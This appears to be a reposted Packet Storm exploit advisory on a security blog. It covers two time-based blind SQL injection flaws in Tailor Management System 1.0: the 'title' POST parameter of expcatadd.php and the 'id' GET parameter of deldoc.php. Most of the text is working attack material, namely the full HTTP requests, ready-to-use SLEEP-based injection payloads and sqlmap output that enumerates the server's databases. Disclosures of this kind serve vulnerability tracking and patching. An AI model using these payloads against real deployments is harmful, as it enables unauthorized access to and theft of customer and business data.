Tailor Management System 1.0 SQL Injection ≈ Packet Storm – Digitalmunition




Exploit/Advisories no-image-featured-image.png

Published on August 7th, 2020 📆 | 5437 Views ⚑

0

Tailor Management System 1.0 SQL Injection ≈ Packet Storm

[*]# Exploit Title: Tailor Management System 1.0 Multiple SQL Injection Vulnerabilities[*]# Google Dork: N/A[*]# Date: 06.08.2020[*]# Exploit Author: Mucahit Karadag[*]# Vendor Homepage: https://www.sourcecodester.com/[*]# Software Link: https://www.sourcecodester.com/php/14378/tailor-management-system-php-mysql.html[*]# Version: 1.0[*]# Tested on: Ubuntu Server 14.04.6 LTS[*]# CVE : N/A

###[*]# Software Description:[*]# Tailor Management Software. This Project was created in PHP MySQL using JavaScript, Ajax, [*]# Bootstrap, HTML, CSS. The software has mainly covered information of the customers. This [*]# tailor software can Manage booking, worker wages, suppliers and customers, and to measure [*]#styles and payment history using web application.[*]#[*]# Vulnerabilitiy Description:[*]# Tailor Management System 1.0 web application is vulnerable to[*]# 2 different SQL injection vulnerabilities in multiple endpoints.[*]###

##[*]## [SQL Injection Identified on “title” Parameter][*]##

POST /tailor/expcatadd.php HTTP/1.1[*]Host: TARGET[*]User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0[*]Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8[*]Accept-Language: en-US,en;q=0.5[*]Accept-Encoding: gzip, deflate[*]Content-Type: application/x-www-form-urlencoded[*]Content-Length: 10[*]Origin: http://TARGET[*]DNT: 1[*]Connection: close[*]Referer: http://TARGET/tailor/expcatadd.php[*]Cookie: PHPSESSID=f6nbmpss36vdiis4ldb2nl11h6[*]Upgrade-Insecure-Requests: 1

title=test

# “title” parameter is vulnerable to SQL injection on HTTP POST rquest to /tailor/expcatadd.php endpoint.[*]Here is PoC:[*]—[*]Parameter: title (POST)[*]Type: time-based blind[*]Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)[*]Payload: title=test’ AND (SELECT 1577 FROM (SELECT(SLEEP(5)))zVYP) AND ‘UKwv’=’UKwv[*]—[*][20:34:49] [INFO] fetching database names[*][20:34:49] [INFO] fetching number of databases[*][20:34:49] [INFO] resumed: 5[*][20:34:49] [INFO] resumed: information_schema[*][20:34:49] [INFO] resumed: mysql[*][20:34:49] [INFO] resumed: performance_schema[*][20:34:49] [INFO] resumed: phpmyadmin[*][20:34:49] [INFO] resumed: tailor[*]available databases [5]:[*][*] information_schema[*][*] mysql[*][*] performance_schema[*][*] phpmyadmin[*][*] tailor

##[*]## [SQL Injection Identified on “id” Parameter][*]##

GET /tailor/deldoc.php?id=123123123 HTTP/1.1[*]Host: 12.0.0.163[*]User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0[*]Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8[*]Accept-Language: en-US,en;q=0.5[*]Accept-Encoding: gzip, deflate[*]DNT: 1[*]Connection: close[*]Cookie: PHPSESSID=cfpvj5ehmrgdpl2d1gh5rc3p90[*]Upgrade-Insecure-Requests: 1

# “id” parameter is vulnerable to SQL injection on HTTP GET rquest to /tailor/deldoc.php?id= endpoint.[*]Here is PoC:[*]—[*]Parameter: id (GET)[*]Type: time-based blind[*]Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)[*]Payload: id=123123123′ AND (SELECT 8657 FROM (SELECT(SLEEP(5)))bntA) AND ‘ovvs’=’ovvs[*]—[*]

Source link

Tagged with:



Leave a Reply

Your email address will not be published. Required fields are marked *


loading...